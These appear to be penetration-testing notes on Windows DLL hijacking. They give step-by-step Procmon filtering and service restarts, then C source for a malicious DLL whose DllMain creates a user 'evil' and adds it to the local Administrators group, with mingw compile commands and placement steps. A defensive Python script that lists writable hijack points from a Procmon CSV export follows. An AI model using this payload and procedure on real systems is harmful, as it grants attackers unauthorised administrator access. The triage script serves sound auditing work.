# DLL/EXE Hijacking

* Run **Procmon** as administrator in the RDP session
* Add filters
  * Result - is - NAME NOT FOUND - Include - click Add
  * Path - ends with - .dll - Include - click Add
  * Apply and OK
* In `cmd.exe`, restart the service so it attempts its DLL loads again:
  * `sc stop dllsvc` (or the service name; `sc.exe stop dllsvc` also works)
  * `sc start dllsvc`
  * OR `net stop <servicename>`
  * `net start <servicename>`
* Procmon now shows the DLL loads that failed with NAME NOT FOUND
* Check whether any of those .dll paths lies in a directory that is **writable**
* Create a .dll with the same name from the **windows\_dll.c** source on Kali

  For x64 compile with `x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll`; for x86 compile with `i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll`.

  ```c
  // windows_dll.c
  // For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
  // For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
  #include <windows.h>
  #include <stdlib.h>   // system()

  BOOL WINAPI DllMain(HINSTANCE hDll, DWORD dwReason, LPVOID lpReserved)
  {
      if (dwReason == DLL_PROCESS_ATTACH) {
          // or we can add a new user to the administrators group
          system("cmd.exe /k net user evil pass1234 /add");
          system("cmd.exe /k net localgroup administrators evil /add");
          ExitProcess(0);
      }
      return TRUE;
  }
  ```

  * Name the output after the DLL the service looked for: `x86_64-w64-mingw32-gcc windows_dll.c -shared -o <vuln-dll>.dll`
* Transfer the **.dll** to the writable location found in **Procmon**
* `sc stop dllsvc & sc start dllsvc`
* The user `evil` has now been added to the local Administrators group
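
For triaging a Procmon CSV export (File > Save as CSV) when auditing a service for DLL loads that resolve through a writable directory, so each directory's ACL can be reviewed and tightened, an added Python example that is not part of the original notes; the log sample is constructed and `dllsvc.exe` / `missing.dll` are placeholder names:

```python
import csv
import io

# Constructed sample of a Procmon CSV export. Process and DLL names are
# placeholders, not captured data. Column order matches Procmon's export.
SAMPLE_PROCMON_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1234567 AM","dllsvc.exe","1234","CreateFile","C:\Windows\System32\missing.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.1234570 AM","dllsvc.exe","1234","CreateFile","C:\Temp\missing.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.1234571 AM","dllsvc.exe","1234","CreateFile","C:\Temp\missing.dll","NAME NOT FOUND","Desired Access: Generic Read"
"10:01:02.1234580 AM","dllsvc.exe","1234","CreateFile","C:\Windows\System32\kernel32.dll","SUCCESS","Desired Access: Generic Read"
"10:01:02.1234590 AM","svchost.exe","800","RegOpenKey","HKLM\SOFTWARE\Example","NAME NOT FOUND","Desired Access: Read"
'''


def missing_dll_loads(csv_text):
    """Return (process, path) pairs for CreateFile operations on a .dll that
    failed with NAME NOT FOUND, deduplicated in first-seen order.

    These are the search-path locations the process probed before giving up;
    any of them that a low-privileged account can write to is a hijack point
    that needs its permissions fixed (or the DLL supplied in a protected dir).
    """
    seen = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Result"] != "NAME NOT FOUND":
            continue
        if row["Operation"] != "CreateFile":        # skip registry etc.
            continue
        if not row["Path"].lower().endswith(".dll"):
            continue
        seen.setdefault((row["Process Name"], row["Path"]), None)
    return list(seen)


def by_directory(hits):
    """Group the hits by directory so each directory's ACL is checked once
    (e.g. with icacls) rather than once per DLL name."""
    groups = {}
    for proc, path in hits:
        directory = path.rsplit("\\", 1)[0]
        groups.setdefault(directory, []).append((proc, path))
    return groups


if __name__ == "__main__":
    for directory, entries in by_directory(missing_dll_loads(SAMPLE_PROCMON_CSV)).items():
        print(directory, "<-", ", ".join(p for _, p in entries))
```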